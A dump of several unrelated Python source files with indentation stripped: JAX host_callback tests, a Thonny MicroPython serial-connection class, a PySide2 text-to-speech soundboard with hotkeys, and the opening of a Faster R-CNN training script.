raise SkipTest("host_callback broken on multi-GPU platforms (#6447)")
if jtu.device_under_test() != "cpu":
assert api.devices("cpu")
self.outside_device = api.devices("cpu")[0]
else:
if len(api.devices("cpu")) == 1:
raise SkipTest("Test needs at least two devices. On CPU use XLA_FLAGS=--xla_force_host_platform_device_count=2")
self.outside_device = api.devices("cpu")[1]
super().setUp()
def test_jax_impl(self):
def f_jax(x):
return jnp.sin(x)
def f_outside(x):
return call_jax_other_device(f_jax, x, device=self.outside_device)
self.assertAllClose(f_jax(3.), f_outside(3.))
self.assertAllClose(f_jax(3.), api.jit(f_outside)(3.))
def test_jax_impl_pytree(self):
def f_jax(x):
# x : dict(a=..., b=...) and output is a list of two elements
return [jnp.sin(x["a"]), jnp.sin(x["b"])]
def f_outside(x):
return call_jax_other_device(f_jax, x, device=self.outside_device)
x = dict(a=3., b=4.)
res_jax = f_jax(x)
# print(f"outside_jaxpr = {api.make_jaxpr(f_outside)(x)}")
res_outside = f_outside(x)
self.assertAllClose(res_jax, res_outside)
def test_jax_grad(self):
def f_jax(x):
return 2. * jnp.sin(x)
def f_outside(x):
return 2. * call_jax_other_device(jnp.sin, x, device=self.outside_device)
res_jax = api.grad(f_jax)(3.)
self.assertAllClose(res_jax, api.grad(f_outside)(3.))
def test_jax_grad_pytree(self):
def f_jax(x):
# x : dict(a=..., b=...) and output is a float
return 3. * jnp.sin(x["a"]) + jnp.sin(x["b"])
def f_outside(x):
return call_jax_other_device(f_jax, x, device=self.outside_device)
x = dict(a=3., b=4.)
res_jax = api.grad(f_jax)(x)
self.assertAllClose(res_jax, api.grad(f_outside)(x))
def test_jax_grad_of_grad(self):
def f_jax(x):
return 2. * x * x * x
def f_outside(x):
return 2. * call_jax_other_device(lambda x: x * x * x, x, device=self.outside_device)
res_jax = api.grad(api.grad(f_jax))(5.)
res_outside = api.grad(api.grad(f_outside))(5.)
self.assertAllClose(res_jax, res_outside)
class OutfeedRewriterTest(jtu.JaxTestCase):
def setUp(self):
if jtu.device_under_test() == "gpu" and jax.device_count() > 1:
raise SkipTest("host_callback broken on multi-GPU platforms (#6447)")
super().setUp()
def assertRewrite(self, expected: str, func: Callable, args: Sequence,
has_input_token=True, has_output_token=True):
"""Check that the rewrite of func(*args) matches expected."""
jaxpr = api.make_jaxpr(func)(*args)
rewritten = hcb._rewrite_closed_jaxpr(jaxpr, # noqa: F841
has_input_token, has_output_token)
# Since it is somewhat annoying to update the Jaxpr assertions when we change
# the Jaxpr printing, we do not check these by default. It is recommended that
# before making changes to the code generation and Jaxpr rewriting, turn on
# the checking, update the expected Jaxpr, and then make the changes.
# assertMultiLineStrippedEqual(self, expected, str(rewritten))
del rewritten
def test_no_outfeed(self):
self.assertRewrite("""
{ lambda ; a.
let b = mul a a
c = add a b
in (c,) }""", lambda x: x + x * x, [0], has_input_token=False,
has_output_token=False)
self.assertRewrite("""
{ lambda ; a d e.
let b = mul a a
c = add a b
in (c,) }""", lambda x: x + x * x, [0], has_output_token=False)
self.assertRewrite("""
{ lambda ; a d e.
let b = mul a a
c = add a b
in (c, d, e) }""", lambda x: x + x * x, [0])
def test_simple_outfeed(self):
self.assertRewrite("""
{ lambda ; a d e.
let b = add a a
c f g = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] b d e
in (c, f, g) }""", lambda x: hcb.id_print(x + x), [0])
def test_simple_outfeed_without_input_token(self):
self.assertRewrite("""
{ lambda ; a b.
let e = create_token a b
f = create_token a b
c = add a b
d g h = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] c e f
in (d,) }""", lambda x1, x2: hcb.id_print(x1 + x2), [1, 2],
has_input_token=False, has_output_token=False)
def test_simple_outfeed_without_input_token_nor_invars(self):
self.assertRewrite("""
{ lambda ; .
let b = create_token
c = create_token
a d e = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] 42 b c
in (a,) }""", lambda: hcb.id_print(42), [],
has_input_token=False, has_output_token=False)
def test_multiple_tap_without_dependencies(self):
def f(x):
hcb.id_print(x, what="x")
hcb.id_print(x + 1, what="x + 1")
return 2
self.assertRewrite("""
{ lambda ; a c d.
let _ e f = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a c d
b = add a 1
_ g h = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] b e f
in (2, g, h) }""", f, [1])
def test_cond(self):
y = jnp.ones(5) # captured const
def func(x, z):
return lax.cond(z > 0, (1, 2), lambda a: (a[0], jnp.zeros(5)),
z, lambda a: (hcb.id_print(a), y))
self.assertRewrite("""
{ lambda a ; b c h i.
let d = gt c 0
e = convert_element_type[ new_dtype=int32 ] d
f g j k =
cond[ branches=( { lambda ; a b c d f g.
let e h i = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] d f g
in (e, a, h, i) }
{ lambda ; f_ a b c g h.
let d = broadcast_in_dim[ broadcast_dimensions=( )
shape=(5,) ] 0.00
in (a, d, g, h) } )
linear=(False, False, False, False, False, False) ] e a 1 2 c h i
in (f, g, j, k) }""", func, [y, 5])
def test_while(self):
ct_body = jnp.ones(5, np.float32) # captured const for the body
ct_cond = jnp.ones(5, np.float32) # captured const for the conditional
def func(x):
# x: f32[5]
# c: (f32[5], f32)
return lax.while_loop(lambda c: c[1] < jnp.sum(c[0] + ct_cond),
lambda c: (ct_body, hcb.id_print(c[1]) + 1.),
(x, np.float32(1.)))
self.assertRewrite("""
{ lambda a b ; c f g.
let d e h i =
while[ body_jaxpr={ lambda ; a b c f g.
let d h i = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] c f g
e = add d 1.00
in (a, e, h, i) }
body_nconsts=1
cond_jaxpr={ lambda ; a b c g h.
let d = add b a
e = reduce_sum[ axes=(0,) ] d
f = lt c e
in (f,) }
cond_nconsts=1 ] a b c 1.00 f g
in (d, e, h, i) }""", func, [ct_body])
def test_while_pred_outfeed(self):
"""A while with outfeed in the pred."""
ct_body = jnp.ones(5) # captured const for the body
ct_cond = jnp.ones(2) # captured const for the conditional
def func(x):
return lax.while_loop(lambda c: hcb.id_print(ct_cond, result=c[1]) < 5,
lambda c: (ct_body, hcb.id_print(c[1]) + 1),
(x, 1))
self.assertRewrite("""
{ lambda a b ; c f g.
let j k l = xla_call[ call_jaxpr={ lambda ; a b c g h.
let d i j = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a g h
e = id_tap_dep c d
f = lt e 5
in (f, i, j) }
donated_invars=(False, False, False, False, False)
name=cond_before ] a c 1 f g
bf d e h i =
while[ body_jaxpr={ lambda ; r s t u v w x.
let y z ba bb =
xla_call[ call_jaxpr={ lambda ; a b c f g.
let d h i = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] c f g
e = add d 1
in (a, e, h, i) }
donated_invars=(False, False, False, False, False)
name=body ] s u v w x
bc bd be =
xla_call[ call_jaxpr={ lambda ; a b c g h.
let d i j = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a g h
e = id_tap_dep c d
f = lt e 5
in (f, i, j) }
donated_invars=(False, False, False, False, False)
name=cond_body ] r y z ba bb
in (bc, y, z, bd, be) }
body_nconsts=2
cond_jaxpr={ lambda ; m n o p q.
let
in (m,) }
cond_nconsts=0 ] a b j c 1 k l
in (d, e, h, i) }""", func, [ct_body])
def test_scan(self):
y = jnp.ones(5) # captured const
def func(x):
return lax.scan(lambda c, a: (hcb.id_print(c), y), (1, 2), x)
self.assertRewrite("""
{ lambda a ; b f g.
let c d h i e =
scan[ jaxpr={ lambda ; a b c g h d.
let e f i j =
outside_call[ arg_treedef=PyTreeDef(tuple, [*,*])
callback=...
has_token=True
identity=True ] b c g h
in (e, f, i, j, a) }
length=5
linear=(False, False, False, False, False, False)
num_carry=4
num_consts=1
reverse=False
unroll=1 ] a 1 2 f g b
in (c, d, e, h, i) }""", func, [y])
def test_scan_custom_jvp(self):
"""custom JVP, inside scan.
This exercises the custom_jvp_call_jaxpr primitives."""
@api.custom_jvp
def f(x):
return x * hcb.id_print(x)
@f.defjvp
def f_jvp(primals, tangents):
x, = primals
x_dot, = tangents
primal_out = f(x)
tangent_out = 3. * x * hcb.id_print(x_dot)
return primal_out, tangent_out
def g(x):
# Sum f(x_i)
return lax.scan(lambda carry, inp: (carry + f(inp), 0.),
np.full(x.shape[1:], 0.), # Like x w/o leading dim
x)[0]
arg = np.full((5,), 0.7)
self.assertRewrite("""
{ lambda ; a c d.
let b e f _ =
scan[ jaxpr={ lambda ; a e f b.
let c g h = custom_jvp_call_jaxpr[ fun_jaxpr={ lambda ; a d e.
let b f g = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a d e
c = mul a b
in (c, f, g) }
num_consts=0 ] b e f
d = add a c
in (d, g, h, 0.00) }
length=5
linear=(False, False, False, False)
num_carry=3
num_consts=0
reverse=False
unroll=1 ] 0.00 c d a
in (b, e, f) }""", g, [arg])
self.assertRewrite("""
{ lambda ; a d e.
let _ _ f g _ b =
scan[ jaxpr={ lambda ; a b h i c d.
let e j k = custom_jvp_call_jaxpr[ fun_jaxpr={ lambda ; a d e.
let b f g = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a d e
c = mul a b
in (c, f, g) }
num_consts=0 ] c h i
f = add a e
g = mul c 3.00
in (f, *, j, k, 0.00, g) }
length=5
linear=(False, True, False, False, False, True)
num_carry=4
num_consts=0
reverse=False
unroll=1 ] 0.00 * d e a *
_ _ h i _ c =
scan[ jaxpr={ lambda ; a b g h c d.
let e = mul b d
f i j = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True
transforms=(('transpose',),) ] e g h
in (*, b, i, j, *, f) }
length=5
linear=(True, True, False, False, True, False)
num_carry=4
num_consts=0
reverse=True
unroll=1 ] * 1.00 f g * b
in (c, h, i) }""", api.grad(g), [arg])
def test_scan_custom_vjp(self):
"""custom VJP, inside scan.
This exercises the custom_vjp_call_jaxpr primitives."""
@api.custom_vjp
def f(x):
return x * hcb.id_print(x)
# f_fwd: a -> (b, residual)
def f_fwd(x):
return f(x), 3. * x
# f_bwd: (residual, CT b) -> [CT a]
def f_bwd(residual, ct_b):
return residual * hcb.id_print(ct_b),
f.defvjp(f_fwd, f_bwd)
def g(x):
# Sum f(x_i)
return lax.scan(lambda carry, inp: (carry + f(inp), 0.),
np.full(x.shape[1:], 0.), # Like x w/o leading dim
x)[0]
arg = np.full((2,), 0.7)
self.assertRewrite("""
{ lambda ; a c d.
let b e f _ =
scan[ jaxpr={ lambda ; a e f b.
let c g h = custom_vjp_call_jaxpr[
fun_jaxpr={ lambda ; a d e.
let b f g = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a d e
c = mul a b
in (c, f, g) }
num_consts=0
] b e f
d = add a c
in (d, g, h, 0.00) }
length=2
linear=(False, False, False, False)
num_carry=3
num_consts=0
reverse=False
unroll=1 ] 0.00 c d a
in (b, e, f) }""", g, [arg])
self.assertRewrite("""
{ lambda ; a d e.
let _ _ f g _ b =
scan[ jaxpr={ lambda ; a b h i c d.
let e j k = custom_vjp_call_jaxpr[
fun_jaxpr={ lambda ; a d e.
let b f g = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a d e
c = mul a b
in (c, f, g) }
num_consts=0
] c h i
f = add a e
g = mul c 3.00
in (f, *, j, k, 0.00, g) }
length=2
linear=(False, True, False, False, False, True)
num_carry=4
num_consts=0
reverse=False
unroll=1 ] 0.00 * d e a *
_ _ h i _ c =
scan[ jaxpr={ lambda ; a b g h c d.
let e i j = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] b g h
f = mul d e
in (*, b, i, j, *, f) }
length=2
linear=(True, True, False, False, True, False)
num_carry=4
num_consts=0
reverse=True
unroll=1 ] * 1.00 f g * b
in (c, h, i) }""", api.grad(g), [arg])
def test_remat_loop(self):
def f(k, x):
x = hcb.id_print(k + x)
return -k * x
def loss(k):
return lax.fori_loop(0, 1, api.remat(f), k)
self.assertRewrite("""
{ lambda ; a c d.
let _ _ b e f =
while[ body_jaxpr={ lambda ; a b c f g.
let d = add a 1
e h i = remat_call[ call_jaxpr={ lambda ; a b g h.
let c = add a b
d i j = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] c g h
e = neg a
f = mul e d
in (f, i, j) }
concrete=False
name=f ] a c f g
in (d, b, e, h, i) }
body_nconsts=0
cond_jaxpr={ lambda ; a b c e f.
let d = lt a b
in (d,) }
cond_nconsts=0 ] 0 1 a c d
in (b, e, f) }""", loss, [2])
def test_named_call(self):
def tap_scalar(init, do_print=False):
@partial(api.named_call, name="step")
def step(acc, step_nr):
acc = acc + step_nr
maybe_print(do_print, step_nr, what="step_nr")
return acc, None
return lax.scan(step, init, np.arange(2, dtype=np.int32))
self.assertRewrite("""
{ lambda a ; b d e.
let c = scan[ jaxpr={ lambda ; a b.
let c = named_call[ call_jaxpr={ lambda ; a b.
let c = add a b
in (c,) }
name=step ] a b
in (c,) }
length=2
linear=(False, False)
num_carry=1
num_consts=0
reverse=False
unroll=1 ] b a
in (c, d, e) }""", tap_scalar, [np.int32(3)])
def test_pmap(self):
def f(xv):
api.pmap(lambda x: jnp.sin(hcb.id_print(x, tap_with_device=True)),
axis_name="i")(xv)
self.assertRewrite("""
{ lambda ; a b c.
let _ d e = xla_pmap[ axis_name=i
axis_size=1
backend=None
call_jaxpr={ lambda ; a d e.
let b f g = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a d e
c = sin b
in (c, f, g) }
devices=None
donated_invars=(False, False, False)
global_arg_shapes=(None,)
global_axis_size=None
in_axes=(0, 0, 0)
name=<lambda>
out_axes=(0, 0, 0) ] a b c
in (d, e) }""", f, [np.array([2.], dtype=np.float32)])
if __name__ == "__main__":
absltest.main(testLoader=jtu.JaxTestLoader())
|
serial_connection.py
|
import serial
from thonny.plugins.micropython.connection import MicroPythonConnection, ConnectionFailedException
import threading
import time
from serial.serialutil import SerialException
import logging
import platform
import sys
from textwrap import dedent
class SerialConnection(MicroPythonConnection):
def __init__(self, port, baudrate, skip_reader=False):
super().__init__()
try:
self._serial = serial.Serial(port, baudrate=baudrate, timeout=None)
self._serial.dtr = 0
self._serial.rts = 0
except SerialException as error:
err_str = str(error)
if "FileNotFoundError" in err_str:
err_str = "port not found"
message = "Unable to connect to " + port + ": " + err_str
# TODO: check if these error codes also apply to Linux and Mac
if error.errno == 13 and platform.system() == "Linux":
# TODO: check if user already has this group
message += "\n\n" + dedent(
"""\
Try adding yourself to the 'dialout' group:
> sudo usermod -a -G dialout <username>
(NB! This needs to be followed by reboot or logging out and logging in again!)"""
)
elif "PermissionError" in message:
message += "\n\n" + dedent(
"""\
If you have serial connection to the device from another program,
then disconnect it there."""
)
elif error.errno == 16:
message += "\n\n" + "Try restarting the device."
raise ConnectionFailedException(message)
if skip_reader:
self._reading_thread = None
else:
self._reading_thread = threading.Thread(target=self._listen_serial, daemon=True)
self._reading_thread.start()
def write(self, data, block_size=255, delay=0.01):
# delay and block size taken from rshell
# https://github.com/dhylands/rshell/blob/master/rshell/pyboard.py#L242
for i in range(0, len(data), block_size):
block = data[i : i + block_size]
# self._log_data(b"[" + block + b"]")
size = self._serial.write(block)
assert size == len(block)
time.sleep(delay)
return len(data)
def _listen_serial(self):
"NB! works in background thread"
try:
data = b""
while True:
data += self._serial.read(1) # To avoid busy loop
if len(data) == 0:
self._error = "EOF"
# print("LISTEN EOFFFFFFFFFF")
break
data += self._serial.read_all()
self.num_bytes_received += len(data)
# don't publish incomplete utf-8 data
try:
data.decode("utf-8") # testing if data decodes
to_be_published = data
data = b""
except UnicodeDecodeError as e:
if e.start == 0:
# Invalid start byte, ie. we have missed first byte(s) of the codepoint.
# No use of waiting, output everything
to_be_published = data
data = b""
else:
to_be_published = data[: e.start]
data = data[e.start :]
if to_be_published:
self._make_output_available(to_be_published)
except Exception as e:
self._error = str(e)
def incoming_is_empty(self):
return self._serial.in_waiting == 0 and super().incoming_is_empty()
def outgoing_is_empty(self):
return self._serial.out_waiting == 0
def reset_output_buffer(self):
self._serial.reset_output_buffer()
def close(self):
if self._serial is not None:
try:
self._serial.cancel_read()
if self._reading_thread:
self._reading_thread.join()
finally:
try:
self._serial.close()
self._serial = None
except Exception:
logging.exception("Couldn't close serial")
class DifficultSerialConnection(SerialConnection):
"""For hardening the communication protocol"""
def _make_output_available(self, data, block=True):
# output Thonny message marker as two parts
pos = data.find(b"<thonny>")
if pos > -1:
super()._make_output_available(data[: pos + 5], block=block)
time.sleep(0.1)
super()._make_output_available(data[pos + 5 :], block=block)
else:
super()._make_output_available(data, block=block)
def debug(*args, file=sys.stderr):
print(*args, file=file)
|
main.py
|
import sys
import os
import time
import threading
from PySide2 import QtWidgets, QtCore, QtGui, QtMultimedia
from PyUI import ui_main
import pyttsx3
import sounddevice as sd
import soundfile as sf
import keyboard
def play(data, fs, device=None, id=0):
if device is None:
sd.play(data, fs)
else:
sd.play(data, fs, device=device)
print(f'process {id}')
class Player(threading.Thread):
def __init__(self, data, fs, device=None, id=0):
threading.Thread.__init__(self)
self.data = data
self.fs = fs
self.device = device
self.id = id
def run(self):
if self.device is None:
sd.play(self.data, self.fs)
else:
sd.play(self.data, self.fs, device=self.device)
print(f'process {self.id}')
# pyinstaller --hidden-import=pyttsx3.drivers --hidden-import=pyttsx3.drivers.dummy --hidden-import=pyttsx3.drivers.espeak --hidden-import=pyttsx3.drivers.nsss --hidden-import=pyttsx3.drivers.sapi5 --onefile --noconsole --icon=icon.ico --name="Text to Mic by MaxGyverTech" main.py
# pyside2-uic UI/main.ui -o PyUI/ui_main.py
class MainWindow(QtWidgets.QMainWindow, ui_main.Ui_MainWindow):
def __init__(self):
super().__init__()
self.ui = ui_main.Ui_MainWindow()
self.ui.setupUi(self)
self.setWindowTitle('TextToMic by MaxGyver')
self.setWindowIcon(QtGui.QIcon('res/icon.ico'))
self.setStyleSheet(open('res/main.qss', 'r').read())
# classes
self.engine = pyttsx3.init()
self.settings = QtCore.QSettings('PySoundpad', 'Settings')
self.ao = QtMultimedia.QAudioOutput(QtMultimedia.QAudioDeviceInfo().defaultOutputDevice())
self.soundfile = QtCore.QFile()
self.s = QtMultimedia.QSound('')
self.proc1 = None
self.proc2 = None
# self.a1 = QtMultimedia.QAudioOutput(QtMultimedia.QAudioDeviceInfo.defaultOutputDevice())
# self.a2 = QtMultimedia.QAudioOutput(QtMultimedia.QAudioDeviceInfo.availableDevices(QtMultimedia.QAudio.AudioInput)[4])
# sett
self.sounds_dir = 'sounds/'
self.key_bind_dir = 'sound_keys/'
self.var_dir = 'var/'
self.device = self.settings.value(f'{self.var_dir}device', 9)
self.voice = self.settings.value(f'{self.var_dir}voice', None)
self.debug = self.settings.value(f'{self.var_dir}debug', True)
# var
self.error_w = None
self.change_voice_window = None
# triggers
self.ui.playButt.clicked.connect(self.ev_play)
self.ui.saveButt.clicked.connect(self.ev_play_save)
self.ui.set_output.triggered.connect(self.change_output)
self.ui.set_voice.triggered.connect(self.change_voice)
self.ui.textEdit.textChanged.connect(self.ev_text_updated)
# init
os.makedirs('sounds', exist_ok=True)
self.update_list()
self.apply_voice(self.voice)
def ev_play(self):
text = self.ui.textEdit.toPlainText()
if not text == '':
self.record_text(self.ui.textEdit.toPlainText())
self.play_sound()
else:
self.play_sound()
def ev_play_save(self):
if self.ui.textEdit.toPlainText() == '':
return
file = self.ui.saveLine.text()
if file == '':
file = self.ui.textEdit.toPlainText()[:20]
self.record_text(self.ui.textEdit.toPlainText(), file=file)
self.play_sound(file=file)
self.update_list()
def ev_text_updated(self):
text = self.ui.textEdit.toPlainText()
if '\n' in text:
self.ev_play()
self.ui.textEdit.clear()
def play_sound(self, file=None):
if file is None:
file = 'sound.wav'
else:
file = f'{self.sounds_dir}{file}.wav'
data, fs = sf.read(file)
# self.my_sd.stop()
# self.my_sd.play(file)
# self.tr1, self.tr2 = None, None
# self.tr1 = Player(data, fs, 9)
# self.tr2 = Player(data, fs, id=1)
# self.tr1.start()
# self.tr2.start()
# sd.play(data, fs)
# sd.wait()
sd.play(data,fs,device=self.device)
self.s.play(file)
# self.soundfile.setFileName(file)
# self.soundfile.open(QtCore.QIODevice.ReadOnly)
# self.ao.start(self.soundfile)
def record_text(self, text, file=None):
if file is None:
file = 'sound.wav'
else:
file = f'{self.sounds_dir}{file}.wav'
self.engine.save_to_file(text, file)
# self.engine.say(text)
self.engine.runAndWait()
def change_output(self):
# items = [str(i)+self.p.get_device_info_by_index(device_index=i).get('name') for i in range(
# self.p.get_device_count()) if self.p.get_device_info_by_index(device_index=i).get('maxOutputChannels') !=
# 0] print(items) devices = [] for i in range(self.p.get_device_count()): dev =
# self.p.get_device_info_by_index(device_index=i) if dev.get('maxOutputChannels') and dev.get('name') not in
# devices: devices.append(dev.get('name'))
devices = list(set(
[i.deviceName() for i in QtMultimedia.QAudioDeviceInfo.availableDevices(QtMultimedia.QAudio.AudioInput)]))
# devices = [i['name'] for i in sd.query_devices()]
item, ok = QtWidgets.QInputDialog().getItem(self, "Настройка выхода", "Выберите устройство", devices, 0, False)
if ok:
device = sd.query_devices(item)[0]
self.device = device.hostapi()
def change_voice(self):
voices = self.engine.getProperty('voices')
index = 0
if self.voice is not None:
for i in range(len(voices)):
if voices[i].id == self.voice:
index = i
break
self.change_voice_window = VoiceSettings(voices, index, parent=self)
self.change_voice_window.show()
def apply_voice(self, voice):
if voice is not None:
self.engine.setProperty('voice', voice)
self.settings.setValue(f'{self.var_dir}voice', voice)
def update_list(self):
self.ui.soundList.clear()
files = [file for file in os.listdir('sounds/') if
os.path.isfile(os.path.join('sounds/', file)) and file.split('.')[len(file.split('.')) - 1] == 'wav']
for file in files:
key = self.settings.value(f'{self.key_bind_dir}{file.split(".")[0]}')
item = SoundItemWidget(file.split('.')[0], key, parent=self)
listItem = QtWidgets.QListWidgetItem(self.ui.soundList)
listItem.setSizeHint(item.sizeHint())
self.ui.soundList.addItem(listItem)
self.ui.soundList.setItemWidget(listItem, item)
def upd_shortcut(self, file, key):
self.settings.setValue(f'{self.key_bind_dir}{file}', key)
def debug_err(self, error, text):
if self.debug:
self.error_w = ErrorWindow(error, text)
self.error_w.show()
else:
print(error, text)
def closeEvent(self, event):
self.error_w = None
self.close()
class SoundItemWidget(QtWidgets.QWidget):
def __init__(self, filename: str, key=None, parent: MainWindow = None):
super(SoundItemWidget, self).__init__(parent)
self.parent = parent
self.filename = filename
self.key = None
self.setObjectName('SoundItemWidget')
self.keyEdit = QtWidgets.QPushButton(key if key is not None else 'Задать сочетание клавиш')
self.keyEdit.setSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Minimum)
self.keyEdit.adjustSize()
self.clear_but = QtWidgets.QPushButton(QtGui.QIcon('res/close.png'), '')
self.clear_but.clicked.connect(self.clear_key)
self.clear_but.setSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Minimum)
self.clear_but.setToolTip('очистить осчетание клавиш')
self.delete_but = QtWidgets.QPushButton(QtGui.QIcon('res/delete.png'), '')
self.delete_but.clicked.connect(self.delete_key)
self.delete_but.setSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Minimum)
self.delete_but.setToolTip('удалить звук/текст')
self.key_layout = QtWidgets.QHBoxLayout()
self.key_layout.addWidget(self.keyEdit)
self.key_layout.addWidget(self.clear_but)
self.key_layout.addWidget(self.delete_but)
self.layout = QtWidgets.QHBoxLayout()
self.layout.addWidget(QtWidgets.QLabel(filename if len(filename)<20 else filename[:19]+'...'))
self.layout.addLayout(self.key_layout)
self.setLayout(self.layout)
self.setToolTip('даблкликни на меня')
if key is not None:
self.key = key
keyboard.add_hotkey(self.key, self.play_sound)
self.keyEdit.clicked.connect(self.key_change)
def clear_key(self):
self.keyEdit.setText('Задать сочетание клавиш')
if self.key is not None:
keyboard.remove_hotkey(self.key)
self.key = None
self.parent.settings.remove(f'{self.parent.key_bind_dir}{self.filename}')
def delete_key(self):
os.remove(f'sounds/{self.filename}.wav')
self.parent.settings.remove(f'{self.parent.key_bind_dir}{self.filename}')
if self.key is not None:
keyboard.remove_hotkey(self.key)
self.parent.update_list()
def key_change(self):
if self.key is not None:
keyboard.remove_hotkey(self.key)
self.keyEdit.setText('...')
self.keyEdit.setStyleSheet('border-width: 2px;')
self.key = keyboard.read_hotkey(suppress=False)
self.keyEdit.setStyleSheet('border-width: 0px;')
self.keyEdit.setText(self.key)
print(self.key)
keyboard.add_hotkey(self.key, SoundItemWidget.play_sound, args=[self])
self.parent.upd_shortcut(self.filename, self.key)
def play_sound(self):
self.parent.play_sound(self.filename)
def mouseDoubleClickEvent(self, event):
self.play_sound()
class VoiceSettings(QtWidgets.QWidget):
def __init__(self, voices, current_voice=0, parent=None):
super(VoiceSettings, self).__init__()
self.setStyleSheet(open('res/main.qss', 'r').read())
self.parent = parent
self.voices = voices
voice_list = [i.name for i in voices]
self.timer = QtCore.QTimer()
self.box = QtWidgets.QComboBox()
self.box.addItems(voice_list)
self.box.setCurrentIndex(current_voice)
self.play_butt = QtWidgets.QPushButton(QtGui.QIcon('res/play.png'), '')
self.box_layout = QtWidgets.QHBoxLayout()
self.box_layout.addWidget(self.box)
self.box_layout.addWidget(self.play_butt)
self.layout = QtWidgets.QVBoxLayout()
self.layout.addLayout(self.box_layout)
self.setLayout(self.layout)
self.setGeometry(500, 500, 300, 100)
self.adjustSize()
self.setFixedSize(self.size())
self.setWindowFlags(QtCore.Qt.WindowStaysOnTopHint | QtCore.Qt.WindowCloseButtonHint)
self.box.currentIndexChanged.connect(self.save)
self.play_butt.clicked.connect(self.test_play)
self.timer.timeout.connect(self.return_title)
self.return_title()
def test_play(self):
self.parent.apply_voice(self.voices[self.box.currentIndex()].id)
self.parent.record_text('Привет это небольшой пример этого голоса')
data, fs = sf.read('sound.wav')
sd.stop()
sd.play(data, fs)
def save(self):
self.timer.start(2000)
self.setWindowTitle('Настройки голоса(сохранено)')
def return_title(self):
self.setWindowTitle('Настройки голоса')
class ErrorWindow(QtWidgets.QWidget):
def __init__(self, error, content):
super(ErrorWindow, self).__init__()
# TODO: set img
title = str(error)[8:len(str(error)) - 2]
text = str(content)
self.setFocus(QtCore.Qt.FocusReason.PopupFocusReason)
self.text_field = QtWidgets.QLabel(text)
self.text_field.setGeometry(0, 0, 300, 100)
self.text_field.setAlignment(QtCore.Qt.AlignTop)
self.layout = QtWidgets.QVBoxLayout()
self.layout.addWidget(self.text_field)
self.setLayout(self.layout)
self.setGeometry(500, 500, 300, 100)
self.setWindowTitle(title)
self.adjustSize()
self.setFixedSize(self.size())
self.setWindowFlags(QtCore.Qt.WindowStaysOnTopHint | QtCore.Qt.WindowCloseButtonHint)
def excepthook(exc_type, exc_value, exc_tb):
window.debug_err(exc_type, exc_value)
def key_loop():
keyboard.wait()
if __name__ == '__main__':
app = QtWidgets.QApplication(sys.argv)
window = MainWindow()
window.show()
key_tr = threading.Thread(target=key_loop)
key_tr.start()
# sys.excepthook = excepthook
app.exec_()
|
train_faster_rcnn_alt_opt.py
|
#!/usr/bin/env python
# --------------------------------------------------------
# Faster R-CNN
# Copyright (c) 2015 Microsoft
# Licensed under The MIT License [see LICENSE for details]
# Written by Ross Girshick
# --------------------------------------------------------
"""Train a Faster R-CNN network using alternating optimization.
This tool implements the alternating optimization algorithm described in our
NIPS 2015 paper ("Faster R-CNN: Towards Real-time Object Detection with Region
Proposal Networks." Shaoqing Ren, Kaiming He, Ross Girshick, Jian Sun.)
"""
import _init_paths
from fast_rcnn.train import get_training_roidb, train_net
from fast_rcnn.config import cfg, cfg_from_file, cfg_from_list, get_output_dir
from datasets.factory import get_imdb
from rpn.generate import imdb_proposals
import argparse
import pprint
import numpy as np
import sys, os
import multiprocessing as mp
import cPickle
import shutil
def parse_args():
"""
Parse input arguments
"""
parser = argparse.ArgumentParser(description='Train a Faster R-CNN network')
parser.add_argument('--gpu', dest='gpu_id',
help='GPU device id to use [0]',
default=0, type=int)
parser.add_argument('--net_name', dest='net_name',
help='network name (e.g., "ZF")',
default=None, type=str)
parser.add_argument('--weights', dest='pretrained_model',
help='initialize with pretrained model weights',
default=None, type=str)
parser.add_argument('--cfg', dest='cfg_file',
help='optional config file',
default=None, type=str)
parser.add_argument('--imdb', dest='imdb_name',
help='dataset to train on',
default='voc_2007_trainval', type=str)
parser.add_argument('--set', dest='set_cfgs',
help='set config keys', default=None,
nargs=argparse.REMAINDER)
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
return args
def get_roidb(imdb_name, rpn_file=None):
imdb = get_imdb(imdb_name)
print 'Loaded dataset `{:s}` for training'.format(imdb.name)
imdb.set_proposal_method(cfg.TRAIN.PROPOSAL_METHOD)
print 'Set proposal method: {:s}'.format(cfg.TRAIN.PROPOSAL_METHOD)
if rpn_file is not None:
imdb.config['rpn_file'] = rpn_file
roidb = get_training_roidb(imdb)
return roidb, imdb
def get_solvers(net_name):
# Faster R-CNN Alternating Optimization
n = 'faster_rcnn_alt_opt'
# Solver for each training stage
solvers = [[net_name, n, 'stage1_rpn_solver60k80k.pt'],
[net_name, n, 'stage1_fast_rcnn_solver30k40k.pt'],
[net_name, n, 'stage2_rpn_solver60k80k.pt'],
[net_name, n, 'stage2_fast_rcnn_solver30k40k.pt']]
solvers = [os.path.join(cfg.MODELS_DIR, *s) for s in solvers]
# Iterations for each training stage
max_iters = [80000, 40000, 80000, 40000]
# max_iters = [100, 100, 100, 100]
# Test prototxt for the RPN
rpn_test_prototxt = os.path.join(
cfg.MODELS_DIR, net_name, n, 'rpn_test.pt')
return solvers, max_iters, rpn_test_prototxt
# ------------------------------------------------------------------------------
# Pycaffe doesn't reliably free GPU memory when instantiated nets are discarded
